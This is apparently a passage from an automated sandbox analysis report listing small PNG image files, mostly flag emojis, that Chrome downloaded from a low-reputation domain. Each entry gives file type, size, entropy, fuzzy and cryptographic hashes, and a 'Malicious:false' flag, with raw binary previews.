                                  Preview:.PNG........IHDR.....................PLTEGpL|2:...g......fmh..yzzh...ow...h..wxw.lso.#yyy....px..,..:j..uuu....fmj...............krg.....vvv.s{k. ...aih..xxxn.#.rz...h..www.gok."...k. .rz....bj....pxb..srr......................................................................................................................................................................................................{..............r}.......fr.qy....lt....[h.gp.bl.bk|||.]h.bj.Xc.O\.R^vvv.Wa.Yb.IW.DR.HU.MX.R[.?N.]a.KU.:J.@M.4E.4E.BN.4D.6F.3D.3D.3C.3D.2C.3C.2B.3C.1B.0A.1B.0A.?K./@.9F..?.4C.0@..?.,=.,=.*;.+<.+<..=.):.3@.(9.(9.&7.8B."4.+:.%6.#4.&5..1.!2.)7..0..,. 0.......!0.(5.!0..,..-."1..+..%..&..*.%2..(. .."...'..(..&..(..%."...#..#.....!..!..'..".. ..*..+.............. ..(..#...y.&...q.$x.....l..s..f..`...`.....otRNS.....!"/279?DOOXZccggksrx~~....................................................................................7......uIDATx..Mo.gr.....g.CQ..,[...6,....-;.]....8...F.....A...
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):4452
                                  Entropy (8bit):7.911722928299787
                                  Encrypted:false
                                  SSDEEP:96:Oy0OMIS/GiMJi8tqlmmPB3d1I2+3/8HB4cYJizYc6ACUq+Xe3:Oy0/Iuf8IlZFHi/8HKaR6ANlXe3
                                  MD5:051EE485409B33161B235C641153510B
                                  SHA1:B0782D35AEE07E4F8F3947FA6DF10BDE2678D01F
                                  SHA-256:34D51AA9E708D4D41C9EDE8DF21EA884A143C35DECFD3E5AF683E45642EF9F69
                                  SHA-512:906204830A0F9AD428F6FF70F3E86667E3A3B340EE4201A2FAE97D555144E0DE4D3405254502AD899F0D64759B3AF26578F9E6340C46DBADDA90ED2FF879B600
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1e8-1f1e6.png
                                  Preview:.PNG........IHDR.....................PLTEGpL.YY......}...gg.....y......[[.....t........ZZ......u...........**.__x........y...,,....aa...{__t........u.....UU.dd......w........``z.....v........//....]]v.........................................................................................................................................................................................................................}}.......oo.......]]...}......PP....``.vv.EE.\\.XX.::.RR.NN.33.gg.EE.HH.)).AA.&&.77.&&.%%.99.$$.%%."".77....11....**.;;..........++..........&&.... ...................))................................................................................................................................................................................................}...........z..t..}C/....9tRNS......'(+36;>HOOXacdgjmlqt{~...............................P.....IDATx..........93....6d.&...B..kI.... h.y.x.........P...S......-..A.....M.n.d.u|..9...c..k.....y.....3c-...
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):5291
                                  Entropy (8bit):7.93828775417545
                                  Encrypted:false
                                  SSDEEP:96:CzTVEZ6uyjnG2EVRiWAkav2rKOP1lD7r4XjAxzh1jninV7:CqQugnG24RpKEhxzhM
                                  MD5:7C7FAAC60E5567604A3FBD0303FBBF57
                                  SHA1:E72F684515CBD1CD7EC7D8DCC07A8ACC707E4709
                                  SHA-256:36AE211E1B0E9C35787BD3FBFF2331FE34A29103DED3BF0AC2863B90EE9A7DCB
                                  SHA-512:9CC9C91B38490986B3D92D83689278D12229A0D1BA5365F30BB95C34050235E971DDB0D464F43C29B17385B6AEEBA69C14B3BBE5950F53D071EA299D7137D55B
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f3-1f1e8.png
                                  Preview:.PNG........IHDR.....................PLTEGpL.=5.$..g;.R'.!e.6{gy.gs.ep..>2.B2.B3iw.2TX.@)=Yi+C..E+i|..D*k{.an.^o.gw..E*.N0.D8.K0es.`o..P1.B%.C%.@#.<"Q`...&..%$P...%....<2$.[.|9.....>..A.6,%R..,...C.\R.;0..........~<..."! %.]....9/.....$.>3.{8.8-.C9.=......#!L..0..3..7.....?4.9..5..E<.OD..H!.X.2...J....;.%._.@.....A7.R*.% ..M..U.s6.YP.4x.V(..E.;4.UK.x8.LB.RH.WM.G=.a-.. ....V0.H".l2.M'.Z3.i<..Q..c.C..6...H.n=.%w..#)S...!....B!.wB..#....sA..F.E..A7.1(.2+.|E..!.*..5,..#..!.I?6].._6.*#.d8.H?,* ...E<..Q".V.....".^T.f2.8.g` ..!HA"..O.0...........8*.=(..#.D8]T NM...K.D.$T.....1...#qj#...&.f..O.......1..cW.x..K.....:..ZF%X..G>..V..>..$.PHA3s?.3..Q.P.a"1?{Ek8cAj9.p&{W5.5F.?0.1.99$..^..,>3.Y>xz}L@...`X.U..1..M6....mP.P[.?K.%gS.XZK.|E0<X.3S.C].<^.Db.0X.1N.Lk.j..)O.Ef.Ka._v.\r.6X.&J.Ph.Wn..?.>b..D..=.e{.Vp..H..Yq....%tRNS.c~c~~c.F$$:Tw.p....f...........]^....5IDATx...n.@...,.MZG..c."S$O..w@..d.$..C..(k.,y.^.b..1s.!...b 1.h.....N8..).p_K.y.....L&..d2.L&..d2.L.AJ..T].|>....j*.~.....r...XO
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):3831
                                  Entropy (8bit):7.915607765866274
                                  Encrypted:false
                                  SSDEEP:96:TIfZkh6YY/EhswpI3HkLWMR5sg2EXFA2lmpY:GNYY/Asv3m5sZEe2sm
                                  MD5:FC65A47573B26405D10ED68C62C0B415
                                  SHA1:4C75B8F58724B9E6C0E168A3E39AD3537AC3FA7A
                                  SHA-256:CBCFA35B6AB8157325FADF4A9527ACE1DC4215D1E190C5D21908CD21AB9EE759
                                  SHA-512:BC62C636F76C9BAFADE7783F8DAB337AE402704522DBD75DDAFB39F500E03F31E867C3B5A425C1C914646360FA33686155D1B0BC5B294ECCA35996D3CEEE2979
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpL`.."A_^..%@cg..%?bf..(Cfe....#.sO5X.">a`..d..!Al.x..Z76oKc..%@dj..$?b`..%?bj..$?ba..g..'Bek..>.h]...9].."..*..1..8..7..6..5.....)..4..3..2.. ..0.....?..-..,.....+..O..(..?.....&.....$..".....!.. ..6... ...`.%....G.......%.....+.(...........%..u....Q......+.......#u.U..|..)..G`.cj.....d..Z....Qn.._....!O..D..p.8\..A.j...M..X.M9.}U.~>.|V..m..V..0.yy.kU..T..S..&.w=.x&.vQ.z&.vR..F.x0.u%.uP..J..$.tT..$.s..2O....zM.BN..!.q8.rE.sL~..|. .o*.m?}...nJ|.M{...~fzs..l..xHz.Xz.3.l*.l8.m.w...j..kFx.=x.Jw....Dw...h..eCu...w..fAt.Fs.&.f..d9.g@r...c4.B(.e>q...q..a2p.=o.An..._.._Al...^:l.Vjk..i..]..\8j.@h.:i...Z6h.*h...Y..Z5f...W..V3d.9c.*d...U..b1c.;a...T.|T0b...R/`.0_...P..Y..O7Z.-[.1Z...O.[.5V..pM.zK*U.3d'+R.0Q|.rE.Ls'M..h@,Hm%Hv'Ch!Cp.[7!>c.9^.5Y.. a...#tRNS...$,7EG[_ccchl{}~~................kg.....IDATx....Wv..}.j..lJ......c%.. ..+...&...~..........y._.A. ..9 ...!.0..:..E.Y...."..f.dK./.+.E.M.W.Z{.......................!.^.Z.A
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):4385
                                  Entropy (8bit):7.943115717111238
                                  Encrypted:false
                                  SSDEEP:96:S7Ch+F1RebmzbF5l4Egsj8GxWxFoZ7SsykP7EdBBCy:uRkmzbF5Arz27SsP70BCy
                                  MD5:D578DD13DA4967D7BC23BC6F371E7CCB
                                  SHA1:69A20D97FE83982B6ED1BE3C30957E2D5B97FBA5
                                  SHA-256:0D446F30909AF3FB48AE1CD2AA848EAC3AD2C9FCCAC9059F9567A289AECF4AC0
                                  SHA-512:CF6111C51B36959DE8358754E6BB746911250496885A53E70BEB46205B9EF1CA0DF79567E93EBE966F4BBFDFCC78F6102259B8C0F9177EA4169AE79B5F20A09E
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1eb-1f1ee.png
                                  Preview:.PNG........IHDR.....................PLTEGpL...pt{...ptx...afmvx{......r...,Fyyy{{{...uuu...}...*D.........rrr$>`~.....qqr%8Q.........&G............qqqs.......uuu.....Hvvv.....s..www...q......-Gtuv...........s...-G...uuu...............................................................................................................................................................................................................................................................................................................................y........o........p..|||j}.`~.yyyuuvbw.qqrYs.Sn.Jh.Qd}He.Ac.:`.>_.9_.8^.7].7\.6\.5[.5[.6Z.4Z.4Y.3Y.3X.2X.2W.0V.2U./U./T..T.-S.,R.0Q|+P.)P.)N.+Mx$N.'M.&L}%K}$J|'Iy'Iu.J."Hz'Gp"Gw!Fx.F~ Dv&Bg.Cu.Bt.As.@q.?p#=^.>o.=m.<l.;k.9k.9i.7W.9p.4_.4j.1M.1h./T.-G.+b.'I.%\..E.c.@...>tRNS..... ",57=?@JLQTU[cccccegwwx}~...............................c......IDATx..M..G....S.=/........$..N....qF(..D..........Cp@BA..H........xg.....S...w.w.v...mOwu.....j..f.
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):4765
                                  Entropy (8bit):7.875996011518644
                                  Encrypted:false
                                  SSDEEP:96:fP55dt6Wq/UTWWb0/QXLVRe3yQ+Fy9jLkoZqy5s71A1NHzgL+:nltbjKWYkLVRe3P0yjLkvs4yhzl
                                  MD5:BC4C71C5B3457C2CD465D4C67633A793
                                  SHA1:CD42F9AB302D615EFF343CB845857B02E9372FAB
                                  SHA-256:E007D8363204C5A55653C00EF86C3FD0D29FEB251369906FDCE32A0283C46055
                                  SHA-512:ABA029EFAA790261D0802A04E7E669E46766B565BFE67297184F7819DDD3972A38723359BFE027731B2C855F85516A7818020BCE366097C8026ACBC1BBEE18C8
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpL..Veq...S_k...Rgt...P<K.gs.......~...(p..Q_k...Y...IS}."\fr...Riu.do.R_...R..Ojv.am...Sgt...Ukx.]i...M........................................................................................................................................o...............................!.................................................................s.........z...y}.......!l}..}Cl.jkw.xw.fr.^p.an.jtc[k._k.-..[i....[h.Ue.Vd.Ob.Pa.R`.^dYE\.I[.M[.AV.$ouEV.GU.?S.AR.9O.>^:=M.3J.BSJ6I.0F.+D.3D.+A.&@.&?.%?.%?.%>.$>.(>.#=."<.(<.#;.!;.0=p :.*N$.9. 8..7..7. 6..5..4..4..1..4..2..2..1..1..1../../...../}.-..-..-..,..,..+..*..=..+|.)..(..(..(..'..(q.'x.&..%..%..%p.#..#.."..$e.!.. .. .. |.!\........s.....f...........W..{...........y..f..r..}..\..R.....i..O..[.....K..9..y..[.M{.....tRNS... (4<JUacccbgv}~.....................................................................................................................................................~....IDATx..
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):3612
                                  Entropy (8bit):7.875604717142779
                                  Encrypted:false
                                  SSDEEP:48:hTlrHkgEQkGvggY0IwkGaF2Gj0T7otOzLakYaWWjPd/VvEot3znbUGDb0Tdbz:RlrJEqvK0ILGIu7oMmkYqFG+3zBb0hz
                                  MD5:EC5F46E9D66F9AF2C747D654586B2C15
                                  SHA1:27B0BF4CC7BD11B0DB5CF1BB9CE270759D3A8A61
                                  SHA-256:013932383E6B581B96E042A2417BAA95F7CBD69C0448F80710D8D8B504E5290E
                                  SHA-512:E62D65DED9AAA736C503260C41049F467B869AD04EFA06389150D34F11919B1F4E0B6F34C2B9DD837EB32EB6F797C0AE9E20B9CC58FD7D0FED12E5F26214E0E2
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f2-1f1ec.png
                                  Preview:.PNG........IHDR.....................PLTEGpL...B$.{x....D%...yw.D&.}.D&.rp....{.:2.^6.J).wsvvv....G).......zu.........xt.E'xxx.....rnwww....G)..yyy...tpxxx..{.F(ttt...........rn.~rrr.?!...................................................................................................................................................}....}y.......yt.tn.oh....up.jb.d\.mg._V.to.XP.YP.XO.XO.UO.WN....d\.ZQ._V.lf.VM.WN.UK.PL.XP.SI.TK.kf.cZ....RH.SJ.PG.PG.GD.NE.cZ.VN{||.LC.qQ.J@.YR.D;.H?.KB.E<uuu.OH.D;.;6xuO.B9.C:.H?.@6S.S.C:.@6^{P.D<.=4=.T.H8.=3%.W.:1.A9*.W&.V./,.:1.[>%.U".U.<3%.U.8/#.T$.U&.T.H<".R.1*.7...V!.Q.5, .P#.Q.5+..O.3*$.P.4*.2)..N.<5..M.?9.1) .M..M..M..J .K..H..G.{H.82..C.}C.vFhQ2.{@.x@.qD.uAD^4.v=.w=.o?.t:.r:.h>.r8.n:.p7.h;.n5.b9.d6.l4.j1.]6.h0.f/.X3.b/._/.R0.Z+.U*.M-.P&.I*.F#.A!.:.(.+!....tRNS.....")28>NPTaccboosu~...................................................................................................................<1.~...BIDATx...M..D...\o..."...."..PVH\
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):4878
                                  Entropy (8bit):7.940632368685932
                                  Encrypted:false
                                  SSDEEP:96:c2wSA7NLh7KmdWlrgT2c25dDcrI5O5PBYER28kH6Eo0YLkbaW/qi:c2VABLNKmKgyzDLOj3jkH6vNL+/
                                  MD5:C958A438BAC689C382F7D552484303C5
                                  SHA1:B3BC3BFE8CF82B94B8AD2A63DCD7BEB4AE92C907
                                  SHA-256:B72FE0DBC860ABC0BA7A4D6369A5D7C5F6A0FD7BE1E51BBAD7FEF9CD0C3D161C
                                  SHA-512:12B2FD1321AA0F58DAE204E82700C3FC6515A83C3C5DAD9531ECAF329C30849B0D2D88767CFB4C21E4FBD6E6286105AA136EC7B97F6579A7422B8E232D6B1083
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpL9ltd...B7_...B3g...B2f....".c..WF.A1`...D1.z..Ks._.e...B2i..<w..B2`...@1h...C3d...E5k...<-\....$../..%..8..6..8..%..7..5..4..2.....1../.....<..,..+.....*..(..E..'.....$..#.....!.._.......?..........(........H.......p..........,...........M....(....&....t...........5..9b..i.......Wr.U..D..#b....#V..I..].....J...U..+o.m..1L..>..Q..4...?n.f<..R.]...R..W.~D..H..-..&..m.2%..%..r.O2..$..\.p%.."..K..!..9.....|. ..A..b.^...%..I..8..*..;.b............?~.*..M~n...1.....0.....I.=%.o...$.n......8{.".m.~....".j!|.....~...h.|.'w..}..z..{..}..{.Uo...e)~N..u.v..x..|a.x..w..~a.u..t..{^.o..q..v\.l..r..|m.o..x[.p..o..qX.m..g..uX.i..l..rU.lT.b..sc.pT.f..mQ.]..^..dN.gN.kN.`..iL.fW.]I.fI.cH.YD.W..^E.^R.TA.X@.Ov.UK.O=.Lr.Kq.G..R<.Jp.J:.M8.G5.D2.A0.<,.9).b..... tRNS....(,;E_ccbct|~~...............Q.}.....IDATx...o\.y...9.={.)Q..6.H.#)R.J..&i.\.4........|*...........u..ARCi...]_.[..B`.R.r).%R..\..23%wO..v.\...e............%}....O.>}..
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):4247
                                  Entropy (8bit):7.921508291878352
                                  Encrypted:false
                                  SSDEEP:96:kW0n7LivCK+wJqYl6HWmP1rG7kGJYWWCGl4U1ahhvffk0T2i:kTG2wJjQH7sfJY1Afj9
                                  MD5:9538AF5882E234349A8A486BBB16F62B
                                  SHA1:83DD5BC80FA8B0CFA4181F3CBF760A811D451AA5
                                  SHA-256:6B3511721A0632E98ACA403C05992AD2D161C0C84B214569F8CE1DE759C4CAF1
                                  SHA-512:3E926CECB16F7C9E4381E71F08764367082ADFF22B296A50C6D2FF5F7E6A09213E1504F9F9D7FA36A4E72DA571FB428B3EBFB31D861E822733330B679257E298
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpL(O(i.i....8..7....l.l.D..:.j.j....9.`.`.=.....Q.k.k.;.mtm.;.d.d..........;.d.dttt......k.k.;.ttt...c.cyyy.<.qqq...zzzvvvi.i...yyyvvv....=.j.j....3......sss.?....k.k[.[.2.rrr............................................................................................................................................................................................................u.u......h.h...e.e...j.jf.f|||b.byyyQ.Q^.^vvvX.Xuuu\.\sssR.RW.WG.GL.LiriR}RF.FI~I>.>FyF;~;5.5CuC/./4x4)})*{*&}&:n:5q5%|%(y(%{%${$$z$#z#$y$$x$"y"*s*"x" x $u$!w! w v !t!.v..u..t..s.)k).s.!p!.r..s..r..q..p..m..p..o..n..i..q..m..l..e..j..g..m..j..h..`..e..c..f..e..j..`..\..c..b..e..Y..`..U..^..W..]..^..]..Y..\..Q..U..P..[..Z..Y..X..L..W..R..H..V..U..T..E..P..L..B..H..=..B..:..6..0...*"...;tRNS......$$&39AGT[ccegovy~~...........................................IDATx...k.\.y.....93{..c...X.`.BZ ..i....R..T.^.J.H.P..H..*.K.V..*...# .B."UQ$Z........2.P@D...].zf.y....9:;.g
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):4508
                                  Entropy (8bit):7.877422135888665
                                  Encrypted:false
                                  SSDEEP:96:U2fy+Or3dydHBLmYh9aO85e/QMGAqBBh4Z6z+dfNZ2ryGAB1XVi5PECh:RfwJEHJnw54TqBBh4Z6ziNMGXB1liv
                                  MD5:237CDDE5971884CA5CD66D437B0A9649
                                  SHA1:4761E38DCBAC8B9084A5B7BE1A7DED99C8846B9B
                                  SHA-256:308EBDBF08F9D5E7F21DABAE1856D6599DABDCBEB2001EE4A186981363E49CBB
                                  SHA-512:5CE0E11834DBB19E02F5AF3CC8D620FD5A610A94B2F1065A06FA16DC411DF159EA648739967AC4BCB1B2B4935A8117DE69EB7979E7AD019B59BAFA458C921877
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f3-1f1ea.png
                                  Preview:.PNG........IHDR.....................PLTEGpL.X...d.Y...d.~`.Y...j.X..}_....F..u,.|^.Y...kS.\.Y........ui./.}$..I".a...g.Y...k.`>.~`.X...l.Y..~a..g.\!.U2..l.^#.R...........................................................................................................................................................................................................................z..........t..dp.~].p.P....l....|C.....eJ._..U.].{L\.k.wC.r5.zQ.vG.r:.}_.zV.l+.l+.m1.k*.j).i(.o<.i).rH.g%0.J.uU.g(0.I/.H.h/.d%-.F.j;.`..b#.b#.mH,.E).B2.I._.).B.Z.._%.b.&.?.e9.\.%.>).A.U..Y.".;..3.d@.U.).@.Z!.W..]+..8.P..T.#.:..6(.>.S..T..P...3..4.R.).=.N...(..5..0.X2.L.....M..G...5..,.I.#.7..*.F..B..K...(.D...-..& .3../.....$.;...$ .2.A..E...#..,....y-..".<..1..} .p(.5..s..i(.5..b&.0..h..^ ~,..b..Y..T..O... ....tRNS.... .69MScccffipv~~~~~...........................................................................................................................:.....IDATx....#g....?..u.'..:..
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):3475
                                  Entropy (8bit):7.865185348117926
                                  Encrypted:false
                                  SSDEEP:48:h/dq+jX8jscMwvvvRVy3nlXvrLcdiA92kaG+YcTPUXIkaKySD3pbd04unXP5flqU:ZdPDM0wXGXRHm+YcTPUXL3yAU9B9qU
                                  MD5:6A6769D356B264E12EF636B159AA5D80
                                  SHA1:506B09EA6AE9AAE8D6134CF1577960D388BE6E88
                                  SHA-256:1C04B5C02DF6C8AD6589528544557F782C0593EF89214022EAAB52DF90B65841
                                  SHA-512:4ACA8C85714D359FC20A743F1EAEB891222033F0F9105EA68E31FFA46C4508CB3169FCCA4753CF515AD10927C725FC6DD39562B18E82F9AD0A4A21460DBEF3C0
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpL.W].|.h.....fl.uye...ir.....k. .hom...nu........v.$.bj.#/.8Be........ipd...IS.$/.."z......0:h...ip.....e......iq.MVd.....yX\...mu.X`k.....f........iqh........lt...h...gnc...GO.................................................................................................................................................q|....nz.......lt.hp.aj.dl.]f.ai.^f.U`.Wa.Xa.KX.R[.LW._c.AO.JT.AM.9H.1B.BM.7E./@.1A.<H..?.->.,=.,=.+<..>.+<.(:.*;.*;.4A.+;.):.(9.(9.-<.=G.'8.(8.8D.&7.$6.&7..<.%6.&6.$5.$5.$5.'6.%5.#4.#4.%5.!2."2.&5. 1.!1.&5}?E.-:.#2.!1..0..0.&5../.1<../...........,. 0v<B..+..,..,..+.%2..+.!0..+..*..)..,..+.'3..)..)..(..(..(..,..'..&..&..&.'2..%..)..%.#...&..$..$.#/..%..+..$..$..$..$..%..+..!..$.. ..&.. }.&........ x..o.....}..z..k..p..h..b...a.B....tRNS...... !+.78?NPPW\^bbdghqpu~~~~.........................................................................................................IDATx.....T......o2!..N....X..CT .`.....#.
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):5671
                                  Entropy (8bit):7.865841232054232
                                  Encrypted:false
                                  SSDEEP:96:5S0luVvqf4eeT064fV8AXb2hVWN/ujVyZ5eUGVD6AOE+R663C62mO06TH1Qiiv:wwuhqg0fNgWN/ujsXeUC0E+RV3h2p0gq
                                  MD5:DD811686055CBD9EB103790EB16B0FE8
                                  SHA1:63DCD9037834AE320617CAF5233A9318F431EFFA
                                  SHA-256:8AF17AF38E6512174A94F52AF48D24ACBD2DDBDA6CFB2AA1B334F14957F1F34A
                                  SHA-512:3A5D9C84BD39E2D215F8C60494338DF7BAF6EA876090D230EEC3C2D7B1C63EA767C6A4E3A67CC45513730420DCFD6E2187C5A5E1DAADFB2B58FD08DD6F743B51
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpL....su...{jl...{st.s}...{xxz.'...vvv....mw..-........ytt...............bf......rrrz.'..{{{....q|z.$...vvv......zzz...z.&.........vvv.......q|.....................................................................................................................................................................................................................................................................................................................................z...........y.....k{.......kx.br....it....Ug.an....rx.Yh}}}.O`.Tcyyy.I[ttt.@T.JZ.CU.9O.bg.4K.4J.3J.3J.3J.3I.1H.8L./F.1G.:L.-D.0E.'?.*A.(?..B.&=..8.$;.&;..7.!8.*<..5.#8..5..0.:E..4..3.!6..2."6..0..0..+..-..-../.#4..+..)..%..&..)..)..&..#../.....$........+.. ......}.'.........4....tRNS...."/17;ENT^cccdgmx}.~~..............................................................................................................................................................
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):4942
                                  Entropy (8bit):7.9249355878434375
                                  Encrypted:false
                                  SSDEEP:96:N1HPqpfS49L34XZbEgajyP0LmKqBvhUjJV4oeU/XFftsqrFFkQT64BhF64ehB2ow:DPfo7YZbxbeWv2JV4ZItfFzThBhF6bhw
                                  MD5:26C9E29333F232532E1BF68F61DA765F
                                  SHA1:2DDDBE25595FE41CBE1F663E309293B52CA74514
                                  SHA-256:2EA39494D482EC12EF06B8E11E84F5C2E5DE73E177882981DEB1D22DBC8FFEFB
                                  SHA-512:257D0B3D47452351354650E10F907D66F452FC16CCA0F8364A4EF895DE920C6A50248F935CDEE3514B906562CBBA086DBB0E7D79682D8B0893ECA39720CC3B55
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f9-1f1f1.png
                                  Preview:.PNG........IHDR.....................PLTEGpL.64.....).ea.Z[u%#.yv.tru%"v%"u$"o$!x'%..n...}{v%#p .u&$t$"t$".}{.rht$"........wq.sq.}{.po.1(.zy...wu.}|....}.~.wu.mk,*..tr.rp.WR.......WR....0+.VQ....TP.UP..J....=9....1-.UP.0,.VQ.SO....GC.74.VQ.72.PL....HD.SN.LH.73.95.OK.JF.RN.A>.UP.A=.<7.B=.>:.40.....E..C.3...H.FB....OK.?;.50.?<.:6....QM.NJ....D?.KG.C?.84.A=.2..QO.....G.51.EA./+.0,.NJ.<7.8.<.63.?;.LH..A.<8.6.IE.VR.1-.:5....2|'%.IE.MH...UQ..;...q..v# .KG.VR.....G....+(.a^.VSl...[V.QL.*(.?<.tq.2/..+.[X....JR..I.,).hd.nk.30./+./,.D@.RN....<7....FB.&#.DR. ..52..>...\X._[.qo..E.SN.c`.jf....-.c_.fc.73.@=..5.nk.;7.XR..I.WS.EA.%"..<+(!.95.H.AM.;G.)5.kh.5@.15.L..@..4;3..*...hI./<......3.-\\\MMM..J..KgR..o'mmm.xF.\8x`..4<<<.l2....sP..,..5._QMB!..J.....<.z"UM&..'..'.<..N...a!.wu.pn..}.kh.{y<..[...-tRNS.c~.......e.A..:y.....wQ..d...Q.k.].0...0v.&.......IDATx^..1..0...t.B.8)1...H(..sg.....H(v...v.......@H1.U.Y.h.qI..gi.......:...z..Z.?m.)?..>.Z..l...Yu.).o_...%.(...6<..'...V[
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):4754
                                  Entropy (8bit):7.933628672832123
                                  Encrypted:false
                                  SSDEEP:96:Fr9hYpO+ovW15JLfQcuSZn9JN4leRLa28hzfFFXE+lZkCyUfIMmDntO:FhhYA+GW15JLYcv9JmleRLa2ILQCyUgK
                                  MD5:474B6568D80533F3B7FF428703421D22
                                  SHA1:6614870C31F2E0EA61BCD5C3E861F143DFBE1082
                                  SHA-256:91ADE6BF3C4300BEA178076406F7343B34BACC52E9F026B0B735BFD424B7A8DC
                                  SHA-512:BE8C524410C2B2AC4CB8384DB5DE87D1B26CD2C9B6494708FB3F26EA192677B56426B43EE17E31C552A8CD45AD7DE69BF8C5570C902E9BA64D205D2D724D63A6
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpL8Hmm|.v..&7]r..#4Zu..aq..)Oy....Tp...0Wu..!2Xz..!2Z[j.-Bsl{..-St...)O]m..,\0Dpn}.z...-Sm|../Tv..o..Td..-Slz.y..dt../Uq...-Sn}..(Nz..#4ZK\..&Ls.."3Ym{._p.y.....................................k.m.p.o.i.p.o....n.n.k.j.u.l.....v....y....~...............{.....s.....x..u..l..r..o..v~.f..k~.m}.g|.jz.fy.]y.ay.fv._u.[u._s.Vq.Yq.^p.Sn.Tl.Xl.Ol.Lj.Sh.Kh.Gh.Fg.Eg.Mf.Ff.Ef.Ff.He.De.Ee.De.Ae.Cd.Nc.Cc.Bc.Cc.Ib.Bb.>b.Aa.@a.@`.A`.@`.C_.A_.=_.>_.I^.>^.<].=].<\.B\.9\.;[.>[.;[.:Z.;Z.9Z.9Y.=Y.9Y.8X.8X.8W.6W.CV.;V.6V.5V.5U.5T.9T.3T.3S.5S.3S.6R.2R.6Q.1Q.0P.3P.1P./O.;N{/O.1N..N.,N..N.2M.4M.-M.-M.-L.,L.1K.-K.+K.*J.*J.*I.)I.+I./H.(H.(H./G|'G.(G.&F.&E.(E.%E.$D.-Cu$C.#C.#B.(B{"B.#B.,Ar"A.!A. A.!@. @.!?.)>l#=v.=~.<}':e#:m.9v%7`.7r.6j$5].3k.2Z.1b.-_.-U.,\.)R.&N.$Kw.....5tRNS.......'&'03@AOP[]`bdipv{~...........................^.D....IDATx....\g.....v^fv7.l.M7..I..7kk..UKmS-.....P.........A..A/.. .......b4...4..m...fgfg.9...00..:X...\,.../..y..S
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 192 x 192, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):3059
                                  Entropy (8bit):7.899443490831859
                                  Encrypted:false
                                  SSDEEP:48:rbX8MSh/sTJOb8c7FVXmwkbt0EUtCYKubFCBsIrmsHdWfBDga5J+njzAoVwj:H41s1bcDm3SDCfKEsvs9sBEiJ43AoVwj
                                  MD5:1A1650D2C76BFC1AC484646C19E495B9
                                  SHA1:FE58D66042CE9241226F5DA9370230285FF604FC
                                  SHA-256:6E587A62C9D7A97F25265AB5EB29D101AD2E36810042A4116D2DD29DA96B0BF8
                                  SHA-512:79C5C9278959BC94F66434779BEBC1B46C055655F0BC58AA375F179C227E7AC0E52DEA196764719D42AADCF98E4FD3B5A4488F2DB977EDDE430AA3DF733C03BC
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/icon-192x192.png
